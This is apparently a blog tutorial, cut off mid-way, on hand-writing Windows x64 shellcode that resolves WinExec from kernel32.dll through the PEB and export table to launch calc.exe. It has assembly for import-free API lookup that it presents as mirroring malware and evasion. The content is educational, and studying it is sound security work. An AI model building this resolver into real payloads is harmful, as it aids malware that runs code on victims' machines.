Table of Contents
- What's this about?
- Who's this for?
- Must Know Concepts (Before You Dive In)
- Why It Matters in Shellcoding?
- Windows x64 Calling Convention
- Understanding Stack Alignment in x64 (Why 16 Byte Matters?)
- What Are We Going to Perform?
- Accessing PEB (Process Environment Block)
- Walking LDR to Locate kernel32.dll
- Getting into Export Table
- Getting Address of WinExec()
- Executing WinExec
- Complete Code
What's this about?
In this blog, we’ll walk through crafting shellcode that locates and calls WinExec("calc.exe", 1) entirely without relying on imported functions. Instead, we’ll manually resolve kernel32.dll and locate WinExec by navigating the process's memory structures.
This technique mirrors real-world malware behavior and is widely used in shellcode payloads and CTF challenges. We’ll break down each part of the code so you understand how it works and why it works.
Who's this for?
This post is intended for:
- Intermediate to advanced developers learning x64 assembly
- CTF participants working with custom shellcode
- Anyone curious about how to access Windows API functions manually
You don’t need to be an expert in reverse engineering, but a basic understanding of registers, memory layout, and the PE file structure will help a lot.
Must Know Concepts (Before You Dive In)
In shellcoding and low-level assembly (especially x86 and x86_64), the terms byte, word, double word, and quad word (qword) describe the size of data being operated on. These sizes map directly to registers and instructions, and understanding them is critical when crafting shellcode.
Term | Size | Bits | Used in Registers Like |
---|---|---|---|
Byte | 1 byte | 8 | AL, BL, CL, DL |
Word | 2 bytes | 16 | AX, BX, CX, DX |
Dword | 4 bytes | 32 | EAX, EBX, ECX, EDX |
Qword | 8 bytes | 64 | RAX, RBX, RCX, RDX |

Register | Bits | Description |
---|---|---|
RAX | 64 | Quad word |
EAX | 32 | Lower 32 bits of RAX |
AX | 16 | Lower 16 bits of EAX |
AH | 8 | High byte of AX |
AL | 8 | Low byte of AX |
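To make the register table concrete, here is a small Python sketch that masks a 64-bit value the same way the sub-register names select parts of RAX. Python is used only as a calculator here, and the helper name subregisters is made up for this illustration.

```python
def subregisters(rax):
    """Return the value visible through each sub-register name of RAX."""
    rax &= 0xFFFFFFFFFFFFFFFF          # keep only 64 bits
    return {
        "RAX": rax,                    # full quad word
        "EAX": rax & 0xFFFFFFFF,       # low 32 bits
        "AX": rax & 0xFFFF,            # low 16 bits
        "AH": (rax >> 8) & 0xFF,       # bits 8..15 (high byte of AX)
        "AL": rax & 0xFF,              # bits 0..7 (low byte of AX)
    }


for name, value in subregisters(0x4142434445464748).items():
    print(f"{name:>3} = {value:#x}")
```

Reading the printed values side by side shows that each smaller name is just a narrower window onto the same register.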
Why It Matters in Shellcoding?
Shellcode is highly size-conscious. Each instruction must:
- Fit within strict size constraints.
- Use correct data sizes to avoid buffer overflows or misalignment.
- Match the target's calling convention (e.g., on Windows x64 the first arguments go in the 64-bit registers RCX, RDX, R8, and R9, while Linux x86_64 uses RDI, RSI, and so on).
Example:
1. Moving Immediate Data:
mov al, 0x41 ; Move 1 byte to AL
mov ax, 0x4142 ; Move 2 bytes to AX
mov eax, 0x41424344 ; Move 4 bytes to EAX (this also zeroes the upper 32 bits of RAX)
mov rax, 0x4142434445464748 ; Move 8 bytes to RAX
2. Stack Operations (ESP/RSP):
push eax ; 32-bit mode only: pushes a dword (4 bytes); not encodable in 64-bit mode
push rax ; 64-bit mode: pushes a qword (8 bytes)
Windows x64 Calling Convention
The Windows x64 Calling Convention (used in 64-bit Windows) defines how functions receive parameters, return values, and manage the stack. It’s crucial for shellcoding, reverse engineering, and writing assembly that interacts with Windows APIs.
Aspect | Rule/Usage |
---|---|
Register Arguments | First 4 arguments: RCX, RDX, R8, R9 |
Return Value | Returned in RAX |
Shadow Space | 32 bytes (4×8 bytes) must be reserved by the caller |
Stack Alignment | Stack (RSP) must be 16-byte aligned before call |
Rest of Arguments | Passed on the stack (right to left) |
Caller-saved regs | RAX, RCX, RDX, R8–R11 |
Callee-saved regs | RBX, RBP, RDI, RSI, R12–R15, RSP |

Param Position | Register | Notes |
---|---|---|
1st argument | RCX | |
2nd argument | RDX | |
3rd argument | R8 | |
4th argument | R9 | |
5th+ arguments | Stack | Right to left order (like C) |
Example:
MessageBoxA(NULL, "Hi", "Title", MB_OK);
Assembly (simplified):
mov rcx, 0 ; HWND hWnd = NULL
mov rdx, str_hi ; LPCSTR lpText
mov r8, str_title ; LPCSTR lpCaption
mov r9d, 0x0 ; UINT uType = MB_OK
sub rsp, 0x28 ; shadow space + align
call MessageBoxA
add rsp, 0x28
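As a rough illustration of the rules above, the following Python sketch maps an argument's position to where the caller places it. It only models integer and pointer arguments, and the names REGISTER_ARGS, SHADOW_SPACE and arg_location are invented for this example. Stack locations are given as seen at the call instruction, before the return address is pushed.

```python
REGISTER_ARGS = ("RCX", "RDX", "R8", "R9")
SHADOW_SPACE = 0x20  # 32 bytes reserved by the caller, just above RSP


def arg_location(index):
    """Location of the integer/pointer argument at 0-based position `index`."""
    if index < 0:
        raise ValueError("argument index must be non-negative")
    if index < len(REGISTER_ARGS):
        return REGISTER_ARGS[index]
    # Stack arguments start right above the shadow space, 8 bytes each.
    offset = SHADOW_SPACE + 8 * (index - len(REGISTER_ARGS))
    return f"[RSP+{offset:#x}]"


for i in range(6):
    print(f"argument {i + 1}: {arg_location(i)}")
```

For MessageBoxA all four arguments fit in registers, which is why the example above never writes an argument to the stack.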
Understanding Stack Alignment in x64 (Why 16 Byte Matters?)
What Is 16-Byte Alignment?
In 64-bit Windows (and Linux), the stack pointer (RSP) must be aligned to a 16-byte (0x10) boundary before calling a function. This is required by the x64 calling convention.
Meaning:
The value in the RSP register must be divisible by 16 (RSP % 16 == 0) at the moment a call instruction executes.
Why Is This Important?
- Misalignment may cause crashes, performance penalties, or incorrect behavior.
- Windows API functions may fail silently or crash if the stack is misaligned when they are called.
Example of Aligned Stack:
Let's say RSP = 0x00000000001FFFD0 — that's 16-byte aligned.
If you do:
call SomeFunction
Then internally, the call pushes the return address (8 bytes), making RSP:
RSP = RSP - 8 = 0x00000000001FFFC8
Now RSP is NOT 16-byte aligned (RSP % 16 == 8) on entry to the function, which is exactly the state every callee expects.
Correcting This: Stack Alignment Before call
To maintain alignment inside the called function, you need to adjust before the call:
Rule of Thumb:
Ensure RSP is 16-byte aligned BEFORE a call, so that after call (which pushes return address), it becomes misaligned by 8 bytes, which is what's expected inside the function.
Example in Shellcode (Manual Stack Setup)
Imagine you're writing shellcode and want to call a function (e.g., WinExec):
sub rsp, 0x28 ; Allocate space & align
call WinExec
add rsp, 0x28 ; Clean up the stack
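Why 0x28 (40 bytes)? Because:
- 32 bytes (shadow space, required by Microsoft x64 calling convention)
- +8 bytes to restore alignment: our own code was entered through a call, so RSP % 16 == 8 on entry, and subtracting 0x28 makes RSP % 16 == 0 at the call instruction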
What Happens If Misaligned?
If you do:
sub rsp, 8
call SomeFunc
And RSP was already aligned, now RSP % 16 == 8 BEFORE the call, so on entry to the function it becomes RSP % 16 == 0.
That violates the convention: the callee assumes RSP % 16 == 8 on entry, so every aligned slot it computes is off by 8. Functions that use aligned SSE instructions such as movaps on stack data (printf is a common example) can then crash.
Visual Summary:
Step | RSP Value | RSP % 16 |
---|---|---|
On entry to our code (after the caller's call) | 0x...D8 | 8 |
sub rsp, 0x28 | 0x...B0 | 0 (aligned at the call instruction) |
call (push ret) | 0x...A8 | 8 (what the callee expects on entry) |
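The arithmetic is easy to check by hand, but a tiny Python sketch makes it harder to get wrong. The helper alignment_trace is a made-up name, and the starting addresses are just sample values: 0x1FFFD8 models code that was itself entered through a call (RSP % 16 == 8), while 0x1FFFD0 models an already aligned RSP.

```python
def alignment_trace(rsp_on_entry, frame_size=0x28):
    """Return (RSP % 16 at the call instruction, RSP % 16 inside the callee)."""
    rsp_at_call = rsp_on_entry - frame_size   # sub rsp, frame_size
    rsp_in_callee = rsp_at_call - 8           # call pushes the return address
    return rsp_at_call % 16, rsp_in_callee % 16


print(alignment_trace(0x1FFFD8))  # entered via call: aligned at the call
print(alignment_trace(0x1FFFD0))  # already aligned: 0x28 misaligns the call
```

The second case is the reason shellcode that cannot assume anything about its entry state often forces alignment with and rsp, -16 instead of relying on a fixed adjustment.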
In Shellcoding
When writing shellcode:
- Always ensure 16-byte alignment before calling any function.
- When issuing a raw syscall instruction, alignment is usually less critical, but it is still good practice.
- Avoiding stack misalignment helps with compatibility across Windows versions, because API internals that use aligned SSE instructions (such as movaps) fault on a misaligned stack.
What Are We Going to Perform?
We're going to manually invoke WinExec("calc.exe", SW_SHOWNORMAL) on a 64-bit Windows system without using imports, by resolving WinExec manually.
#include <windows.h>
int main() {
// Launch calculator
WinExec("calc.exe", SW_SHOWNORMAL);
return 0;
}
On Linux, you’d invoke syscalls directly. On Windows, syscall numbers change between builds, so shellcode instead resolves WinExec manually from the export table of kernel32.dll.
This can be achieved by:
Step | Purpose |
---|---|
1 | Access PEB via gs:[0x60] |
2 | Walk loader data to find kernel32.dll base |
3 | Locate Export Directory |
4 | Search for "WinExec" in Export Names |
5 | Get function address via Ordinal and Address table |
6 | Push calc.exe and call WinExec |
Accessing PEB (Process Environment Block)
To access the PEB (Process Environment Block), we first need to access the TEB (Thread Environment Block), because the TEB structure contains a pointer to the PEB:
typedef struct _TEB64 {
NT_TIB64 NtTib; // 0x0000
PVOID EnvironmentPointer; // 0x0038
CLIENT_ID64 ClientId; // 0x0040
PVOID ActiveRpcHandle; // 0x0050
PVOID ThreadLocalStoragePointer; // 0x0058
PPEB64 ProcessEnvironmentBlock; // 0x0060
ULONG LastErrorValue; // 0x0068
ULONG CountOfOwnedCriticalSections; // 0x006C
PVOID CsrClientThread; // 0x0070
PVOID Win32ThreadInfo; // 0x0078
ULONG User32Reserved[26]; // 0x0080
ULONG UserReserved[5]; // 0x00E8
PVOID WOW32Reserved; // 0x0100
ULONG CurrentLocale; // 0x0108
ULONG FpSoftwareStatusRegister; // 0x010C
PVOID SystemReserved1[54]; // 0x0110
LONG ExceptionCode; // 0x02C0
PVOID ActivationContextStackPointer; // 0x02C8
BYTE SpareBytes1[24]; // 0x02D0
PVOID TxFsContext; // 0x02E8
GDI_TEB_BATCH64 GdiTebBatch; // 0x02F0
CLIENT_ID64 RealClientId; // 0x04D8
PVOID GdiCachedProcessHandle; // 0x04E8
ULONG GdiClientPID; // 0x04F0
ULONG GdiClientTID; // 0x04F4
PVOID GdiThreadLocalInfo; // 0x04F8
ULONGLONG Win32ClientInfo[62]; // 0x0500
PVOID glDispatchTable[233]; // 0x06F0
ULONGLONG glReserved1[29]; // 0x10D8
PVOID glReserved2; // 0x1168
PVOID glSectionInfo; // 0x1170
PVOID glSection; // 0x1178
PVOID glTable; // 0x1180
PVOID glCurrentRC; // 0x1188
PVOID glContext; // 0x1190
ULONG LastStatusValue; // 0x1198
UNICODE_STRING StaticUnicodeString; // 0x11A0
WCHAR StaticUnicodeBuffer[261]; // 0x11B0
PVOID DeallocationStack; // 0x13C8
PVOID TlsSlots[64]; // 0x13D0
LIST_ENTRY TlsLinks; // 0x15D0
PVOID Vdm; // 0x15E0
PVOID ReservedForNtRpc; // 0x15E8
PVOID DbgSsReserved[2]; // 0x15F0
ULONG HardErrorMode; // 0x1600
// ... additional fields follow
} TEB64, *PTEB64;
From the above structure, we can see that the PEB is located at offset 0x60 in the TEB.
How Do We Access the TEB?
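On Windows x64, the TEB is accessible via the GS segment register: the GS base points at the TEB, so a gs-relative read at a given offset returns the TEB field at that offset. Here's how it looks in assembly (NASM syntax, where the segment override goes inside the brackets):
xor rcx , rcx
mov rax , [gs:rcx + 0x30] ; TEB (NT_TIB.Self, the TEB's own address)
mov rbx , [gs:rcx + 0x60] ; PEB
Going through rcx instead of writing the offset as an absolute address keeps null bytes out of the encoded instruction.
You can also simplify this if you’re directly interested in the PEB:
xor rcx , rcx
mov rbx , [gs:rcx + 0x60] ; PEB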
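If you want to double-check the 0x60 offset without a debugger, one option is to model the first few TEB fields with Python's ctypes and let it compute the layout. This is only a sketch of the leading fields listed above, with every pointer written as a 64-bit integer; the class name TEB64_PREFIX is made up for this example.

```python
import ctypes


class NT_TIB64(ctypes.Structure):
    _fields_ = [
        ("ExceptionList", ctypes.c_uint64),
        ("StackBase", ctypes.c_uint64),
        ("StackLimit", ctypes.c_uint64),
        ("SubSystemTib", ctypes.c_uint64),
        ("FiberData", ctypes.c_uint64),
        ("ArbitraryUserPointer", ctypes.c_uint64),
        ("Self", ctypes.c_uint64),            # the TEB's own address
    ]


class CLIENT_ID64(ctypes.Structure):
    _fields_ = [
        ("UniqueProcess", ctypes.c_uint64),
        ("UniqueThread", ctypes.c_uint64),
    ]


class TEB64_PREFIX(ctypes.Structure):
    """Only the leading TEB fields, enough to reach the PEB pointer."""
    _fields_ = [
        ("NtTib", NT_TIB64),
        ("EnvironmentPointer", ctypes.c_uint64),
        ("ClientId", CLIENT_ID64),
        ("ActiveRpcHandle", ctypes.c_uint64),
        ("ThreadLocalStoragePointer", ctypes.c_uint64),
        ("ProcessEnvironmentBlock", ctypes.c_uint64),
    ]


print(hex(NT_TIB64.Self.offset))
print(hex(TEB64_PREFIX.ProcessEnvironmentBlock.offset))
```

Because the layout is computed from field sizes alone, the sketch runs on any platform and does not touch a real TEB.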
Walking LDR to Locate kernel32.dll
To locate kernel32.dll, we need to understand the structure of LIST_ENTRY, which is a doubly linked list used by Windows to track loaded modules:
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink; // Forward link
struct _LIST_ENTRY *Blink; // Backward link
} LIST_ENTRY, *PLIST_ENTRY;
Each module loaded by the process, such as ntdll.dll, kernel32.dll, user32.dll, and others, is part of this linked list.
In InMemoryOrderModuleList, the modules of a process typically appear in this order:
- the executable itself (entry 0)
- ntdll.dll
- kernel32.dll
- any other dependent/shared libraries
So kernel32.dll is typically entry 2, the second module after the executable.
To reach it we go through InMemoryOrderModuleList. The list head's Flink points at entry 0 (the executable), so from there we follow Flink twice to traverse forward to kernel32.dll.
InMemoryOrderModuleList can be accessed via this chain:
InMemoryOrderModuleList <- ldr <- PEB <- TEB
We've already accessed the PEB. Now let’s look at the PEB structure to locate Ldr:
PEB64 Structure:
typedef struct _PEB {
BYTE InheritedAddressSpace; // 0x000
BYTE ReadImageFileExecOptions; // 0x001
BYTE BeingDebugged; // 0x002
BYTE BitField; // 0x003
ULONG Padding0; // 0x004 (alignment padding)
PVOID Mutant; // 0x008
PVOID ImageBaseAddress; // 0x010 -> Base address of the main module
PVOID Ldr; // 0x018 -> Pointer to PEB_LDR_DATA
// ... remaining fields omitted
} PEB, *PPEB;
The offset of Ldr is 0x018.
Calculation:
offset = 4 * 1 (four BYTE fields) + 4 (padding) + 2 * 8 (two 64-bit pointers) = 24 // 0x018
Ldr structure (PEB_LDR_DATA):
typedef struct _PEB_LDR_DATA {
ULONG Length; // 0x00
BOOLEAN Initialized; // 0x04
BYTE Reserved1[3]; // 0x05 - padding
PVOID SsHandle; // 0x08
LIST_ENTRY InLoadOrderModuleList; // 0x10
LIST_ENTRY InMemoryOrderModuleList; // 0x20
LIST_ENTRY InInitializationOrderModuleList; // 0x30
// ... More fields exist but usually not needed
} PEB_LDR_DATA, *PPEB_LDR_DATA;
LIST_ENTRY, being a doubly linked list node containing two pointers, has size 16, so the offset of InMemoryOrderModuleList can be calculated as:
offset = 4 + 1 + 3 + 8 + 16 = 32 // 0x20
Conclusion:
- Ldr is at PEB + 0x18
- InMemoryOrderModuleList is at Ldr + 0x20
which can be interpreted as:
mov rbx , [rbx + 0x18] ; rbx = PEB.Ldr (pointer to PEB_LDR_DATA)
mov rbx , [rbx + 0x20] ; rbx = InMemoryOrderModuleList.Flink (entry 0)
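The two hand-computed offsets can be cross-checked the same way as before, by describing the structures to Python's ctypes and asking it for the field offsets. This is a sketch of only the fields shown above; the class names ending in 64 or _PREFIX are invented for the example, and pointers are modelled as 64-bit integers.

```python
import ctypes


class LIST_ENTRY64(ctypes.Structure):
    _fields_ = [
        ("Flink", ctypes.c_uint64),   # forward link
        ("Blink", ctypes.c_uint64),   # backward link
    ]


class PEB64_PREFIX(ctypes.Structure):
    """Leading PEB fields, up to and including Ldr."""
    _fields_ = [
        ("InheritedAddressSpace", ctypes.c_uint8),
        ("ReadImageFileExecOptions", ctypes.c_uint8),
        ("BeingDebugged", ctypes.c_uint8),
        ("BitField", ctypes.c_uint8),
        ("Padding0", ctypes.c_uint32),
        ("Mutant", ctypes.c_uint64),
        ("ImageBaseAddress", ctypes.c_uint64),
        ("Ldr", ctypes.c_uint64),
    ]


class PEB_LDR_DATA64(ctypes.Structure):
    _fields_ = [
        ("Length", ctypes.c_uint32),
        ("Initialized", ctypes.c_uint8),
        ("Reserved1", ctypes.c_uint8 * 3),
        ("SsHandle", ctypes.c_uint64),
        ("InLoadOrderModuleList", LIST_ENTRY64),
        ("InMemoryOrderModuleList", LIST_ENTRY64),
        ("InInitializationOrderModuleList", LIST_ENTRY64),
    ]


print(hex(PEB64_PREFIX.Ldr.offset))
print(hex(PEB_LDR_DATA64.InMemoryOrderModuleList.offset))
```

Both values should agree with the displacements used in the two mov instructions.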
We are now at entry 0 of the process's module list (the executable itself). To traverse to kernel32.dll we follow Flink twice from here:
(entry 0).Flink.Flink // kernel32.dll
which looks like:
mov rbx , [rbx] ; entry 1: ntdll.dll
mov rbx , [rbx] ; entry 2: kernel32.dll
But for now, rbx only points into the kernel32.dll module entry, specifically at its InMemoryOrderLinks field (offset 0x10 of the entry), because that is the field this list is threaded through. To proceed further, we need the module's base address, which is stored in the DllBase field of the same structure.
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks; // +0x00
LIST_ENTRY InMemoryOrderLinks; // +0x10
LIST_ENTRY InInitializationOrderLinks; // +0x20
PVOID DllBase; // +0x30 ← This is the base address
...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
To access DllBase, we need to jump +0x20 (32 bytes) from the current position: DllBase is at +0x30 in the entry and rbx points at +0x10.
This can be done using:
mov r8 , [rbx+0x20]
At this point, r8 contains the base address of kernel32.dll.
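To see why the final displacement is 0x20 and not 0x30, it can help to replay the walk on a toy memory image. The Python sketch below models memory as a dictionary from address to 8-byte value. The addresses, the module bases and the helper names (build_fake_memory, third_module_base) are all invented for the illustration; only the three structure offsets come from the text above.

```python
IN_MEMORY_ORDER_LIST = 0x20   # InMemoryOrderModuleList inside PEB_LDR_DATA
IN_MEMORY_ORDER_LINKS = 0x10  # InMemoryOrderLinks inside LDR_DATA_TABLE_ENTRY
DLL_BASE = 0x30               # DllBase inside LDR_DATA_TABLE_ENTRY


def build_fake_memory(ldr, modules):
    """modules: list of (entry_address, dll_base) pairs in memory order."""
    memory = {}
    head = ldr + IN_MEMORY_ORDER_LIST
    links = [entry + IN_MEMORY_ORDER_LINKS for entry, _ in modules]
    # Circular Flink chain: head -> entry 0 -> entry 1 -> ... -> head
    for current, following in zip([head] + links, links + [head]):
        memory[current] = following
    for entry, base in modules:
        memory[entry + DLL_BASE] = base
    return memory


def third_module_base(memory, ldr):
    rbx = memory[ldr + IN_MEMORY_ORDER_LIST]  # mov rbx, [rbx + 0x20] -> entry 0
    rbx = memory[rbx]                         # mov rbx, [rbx]        -> entry 1
    rbx = memory[rbx]                         # mov rbx, [rbx]        -> entry 2
    # rbx points at InMemoryOrderLinks (+0x10), so DllBase is 0x20 further on.
    return memory[rbx + (DLL_BASE - IN_MEMORY_ORDER_LINKS)]


fake = build_fake_memory(
    0x1000,
    [(0x2000, 0x400000), (0x3000, 0x7FFA0000), (0x4000, 0x7FFB0000)],
)
print(hex(third_module_base(fake, 0x1000)))
```

Swapping the last displacement for 0x30 makes the lookup miss in this model, which mirrors reading the wrong field on a real system.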
Memory Walk Visualized:
GS base → TEB
+0x60 → PEB
+0x18 → Ldr (PEB_LDR_DATA)
+0x20 → InMemoryOrderModuleList
↓ Flink (executable → ntdll.dll → kernel32.dll)
→ kernel32.dll module entry (pointer lands on InMemoryOrderLinks, +0x10)
+0x20 → DllBase (entry + 0x30)
Visualising the Memory Layout (TEB → PEB → LDR → Module → DllBase)
+--------------------------+
| GS Segment |
+--------------------------+
↓
+--------------------------+
| TEB (at GS:[0]) |
| +0x60 → PEB |
+--------------------------+
↓
+--------------------------+
| PEB |
| +0x18 → Ldr |
+--------------------------+
↓
+--------------------------+
| PEB_LDR_DATA |
| +0x20 → InMemoryOrderModuleList (LIST_ENTRY)
+--------------------------+
↓
+--------------------------+
| LIST_ENTRY (entry 0) | → the executable
| LIST_ENTRY (entry 1) | → ntdll.dll
| LIST_ENTRY (entry 2) | → kernel32.dll
+--------------------------+
↓
+--------------------------+
| LDR_DATA_TABLE_ENTRY | ← rbx points at its InMemoryOrderLinks (+0x10) after the Flink hops
| +0x30 → DllBase | ← base of kernel32.dll, read as [rbx + 0x20]
+--------------------------+
Why Do We Need DllBase?
We use DllBase to manually parse the Export Table of kernel32.dll, locate functions like WinExec, and call them directly without relying on imports, which is crucial in shellcode and evasion techniques.
Getting into Export Table
Our next step is to access the Export Table of kernel32.dll in order to retrieve information about the WinAPI functions it exports.
To navigate to the Export Table, follow this pointer chain:
Export Table <- PE hdrs offset <- DOS Header
Accessing the DOS Header
We don’t need to do anything extra, because when a PE (Portable Executable) file like a DLL or EXE is loaded into memory:
- The DLL base address (also called ImageBase) points to the beginning of the loaded image in memory.
- The DOS header (IMAGE_DOS_HEADER) starts exactly at that base address.
Memory Layout:
DLLBase
│
├─> 0x00: DOS Header ('MZ' = 0x5A4D)
│ └─> 0x3C: e_lfanew (DWORD) → offset to PE Header
│
├─> DLLBase + e_lfanew → PE Header ('PE\0\0')
│ └─> +0x18: Optional Header
│ └─> +0x70: DataDirectory[0] (Export Table RVA + Size)
DOS Header structure :
typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
WORD e_magic; // Magic number: "MZ" (0x5A4D)
WORD e_cblp; // Bytes on last page of file
WORD e_cp; // Pages in file
WORD e_crlc; // Relocations
WORD e_cparhdr; // Size of header in paragraphs
WORD e_minalloc; // Minimum extra paragraphs needed
WORD e_maxalloc; // Maximum extra paragraphs needed
WORD e_ss; // Initial (relative) SS value
WORD e_sp; // Initial SP value
WORD e_csum; // Checksum
WORD e_ip; // Initial IP value
WORD e_cs; // Initial (relative) CS value
WORD e_lfarlc; // File address of relocation table
WORD e_ovno; // Overlay number
WORD e_res[4]; // Reserved words
WORD e_oemid; // OEM identifier (for e_oeminfo)
WORD e_oeminfo; // OEM information; e_oemid specific
WORD e_res2[10]; // Reserved words
LONG e_lfanew; // File address of new exe header (PE Header offset)
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
Accessing the Export Table
Note: Most offsets stored in the PE headers and the export directory are RVAs (Relative Virtual Addresses), i.e., they are relative to the base of kernel32.dll.
To convert an RVA to a VA (Virtual Address), add the base address of the module (DllBase).
Step 1: Get PE Header Offset via e_lfanew
mov edx , [r8 + 0x3c] ; e_lfanew: offset of the PE Header from the image base
lea rdx , [rdx + r8] ; VA of PE Header
In a 64-bit (PE32+) image, the Export Table entry (DataDirectory[0]) is at offset +0x88 from the PE Header: 0x18 to the Optional Header plus 0x70 to DataDirectory[0].
Step 2: Get RVA of Export Table from PE Header
xor rcx , rcx
mov cl , 0x88 ; going through cl avoids the null bytes a 32-bit displacement of 0x88 would encode
mov edx , [rdx + rcx] ; RVA of Export Table
lea rdx , [rdx + r8] ; VA of Export Table
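The same two steps can be tried offline against a byte buffer. The Python sketch below reads e_lfanew at 0x3C, checks the PE signature, and reads the export directory RVA at +0x88, which assumes a 64-bit (PE32+) image. The function names and the synthetic image produced by make_fake_image are invented for the example; it is not a real DLL, just enough bytes to exercise the offsets.

```python
import struct

E_LFANEW_OFFSET = 0x3C
EXPORT_DIR_OFFSET = 0x88  # PE32+ only: 0x18 (Optional Header) + 0x70


def export_directory_va(image, base):
    """Return the VA of the export directory for a mapped PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, E_LFANEW_OFFSET)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (export_rva,) = struct.unpack_from("<I", image, e_lfanew + EXPORT_DIR_OFFSET)
    return base + export_rva          # RVA -> VA


def make_fake_image(e_lfanew=0x80, export_rva=0x1234):
    """Build a zero-filled buffer with just the fields read above."""
    image = bytearray(0x200)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, E_LFANEW_OFFSET, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<I", image, e_lfanew + EXPORT_DIR_OFFSET, export_rva)
    return bytes(image)


print(hex(export_directory_va(make_fake_image(), 0x7FFB0000)))
```

The signature checks are extra safety that the shellcode skips to save bytes; there the loader has already validated the image.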
Getting Address of WinExec
Now that we've handled the complex part, parsing the PE headers and finding the export table, it's time to resolve the address of the WinExec function, which is comparatively simpler.
Structure of Export Table
typedef struct _IMAGE_EXPORT_DIRECTORY {
DWORD Characteristics; // 0x00 - Reserved, usually zero
DWORD TimeDateStamp; // 0x04 - Timestamp of export table creation
WORD MajorVersion; // 0x08 - Major version number
WORD MinorVersion; // 0x0A - Minor version number
DWORD Name; // 0x0C - RVA of DLL name (ASCII string)
DWORD Base; // 0x10 - Starting ordinal number (usually 1)
DWORD NumberOfFunctions; // 0x14 - Total number of function addresses
DWORD NumberOfNames; // 0x18 - Number of named exports
DWORD AddressOfFunctions; // 0x1C - RVA of DWORD array of function RVAs
DWORD AddressOfNames; // 0x20 - RVA of DWORD array of function name RVAs
DWORD AddressOfNameOrdinals; // 0x24 - RVA of WORD array of ordinals
} IMAGE_EXPORT_DIRECTORY;
Steps to Resolve WinExec Address
1. Find the name index of WinExec by scanning the AddressOfNames array (+0x20).
2. Use that index to read WinExec's ordinal (its function index) from the AddressOfNameOrdinals array (+0x24).
3. Use the ordinal to read the function's RVA from the AddressOfFunctions array (+0x1C), and add the base to get the VA.
Step 1: Finding the Function Name WinExec
Registers Used:
- rdx = base address of Export Table (i.e., pointer to IMAGE_EXPORT_DIRECTORY)
- r8 = DLL base address (e.g., base of kernel32.dll)
- rsi = will point to array of function name RVAs (i.e., AddressOfNames)
- rcx = index counter for loop
- rax/eax = temp register for reading name RVA and checking characters
mov esi, [rdx + 0x20] ; Get RVA of AddressOfNames → esi
lea rsi, [rsi + r8] ; Convert RVA to actual address → rsi = AddressOfNames[]
Loop through the names:
xor rcx, rcx ; Clear loop index
Find_next:
mov eax, [rsi + rcx * 4] ; Get RVA of name at index rcx
add rax, r8 ; Convert RVA to actual address → rax = &function_name
Compare with WinExec (manual byte match):
cmp dword [rax], 0x456e6957 ; Compare first 4 bytes → "WinE"
jnz next ; Not match? Go to next
cmp word [rax + 4], 0x6578 ; Compare next 2 bytes → "xe"
jnz next
cmp byte [rax + 6], 0x63 ; Compare last byte → "c"
jnz next
jmp found ; Match found → jump to found
"WinExec" = 'W' 'i' 'n' 'E' 'x' 'e' 'c'
In little-endian:
"WinE" → 0x456e6957
"xe" → 0x6578
'c' → 0x63
If not matched:
next:
inc rcx ; Try next function name
jmp Find_next ; Loop
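found: ; Got the name index
; rcx now holds the index of "WinExec" in the AddressOfNames array
The above code loops through the exported function names of the DLL and finds the one that starts with WinExec, comparing 4, 2, and 1 bytes at a time. It does not check the terminating null byte or bound the loop by NumberOfNames, so it relies on the DLL actually exporting WinExec, as kernel32.dll does.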
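The little-endian constants used in the comparison are easy to get backwards, so here is a short Python check that derives them from the name itself. The helper name_chunks is a made-up name; it splits a 7-byte name into the same dword, word and byte pieces the cmp instructions use.

```python
def name_chunks(name):
    """Split a 7-byte export name into (dword, word, byte) little-endian values."""
    if len(name) != 7:
        raise ValueError("expected exactly 7 bytes")
    dword = int.from_bytes(name[0:4], "little")   # bytes 0..3
    word = int.from_bytes(name[4:6], "little")    # bytes 4..5
    byte = name[6]                                # byte 6
    return dword, word, byte


dword, word, byte = name_chunks(b"WinExec")
print(f"{dword:#x} {word:#x} {byte:#x}")
```

The same helper works for any other 7-character export name if you want to adapt the comparison.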
Step 2: Get Ordinal Index
mov esi, [rdx + 0x24] ; offset 0x24 = AddressOfNameOrdinals RVA
add rsi, r8 ; convert RVA to VA → rsi = &NameOrdinals[0]
movzx ecx, word [rsi + rcx * 2] ; get ordinal index for WinExec
This gets the ordinal of the function WinExec using the same index (rcx) used in the name array.
Step 3: Get Function Address
mov esi, [rdx + 0x1c] ; offset 0x1C = AddressOfFunctions RVA
movsxd rsi, esi ; redundant: the 32-bit load above already zero-extended into rsi
add rsi, r8 ; convert RVA to VA → rsi = &FunctionAddresses[0]
mov eax, [rsi + rcx * 4] ; get RVA of function using ordinal index
movsxd r9, eax ; widen the RVA to 64 bits (image RVAs are small positive values, so the sign is never set)
add r9, r8 ; r9 = actual address of WinExec
Now, r9 contains the actual memory address of WinExec().
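The three lookups are easier to follow once the tables are written out as plain lists. The Python sketch below models AddressOfNames, AddressOfNameOrdinals and AddressOfFunctions as lists and resolves a name the same way the assembly does. The table contents, the base address and the function name resolve_export are toy values invented for the illustration, not real kernel32.dll data.

```python
def resolve_export(base, names, name_ordinals, function_rvas, wanted):
    """Resolve `wanted` to a VA using the three export tables."""
    for index, name in enumerate(names):           # step 1: scan AddressOfNames
        if name == wanted:
            ordinal = name_ordinals[index]          # step 2: AddressOfNameOrdinals
            return base + function_rvas[ordinal]    # step 3: AddressOfFunctions
    return None                                     # name is not exported


names = ["CreateFileA", "WinExec", "lstrlenA"]
name_ordinals = [2, 0, 1]          # parallel to `names`
function_rvas = [0x5000, 0x6000, 0x7000]

address = resolve_export(0x7FFB0000, names, name_ordinals, function_rvas, "WinExec")
print(hex(address))
```

Note that the name index (1 here) and the ordinal (0 here) differ, which is exactly why the ordinal table sits between the name table and the function table.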
Executing WinExec()
We now have the address of WinExec, and it's time to execute it using proper calling convention.
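1. Building the String calc.exe on the Stack
xor edx, edx ; rdx = 0
push rdx ; 8 zero bytes: the string's null terminator
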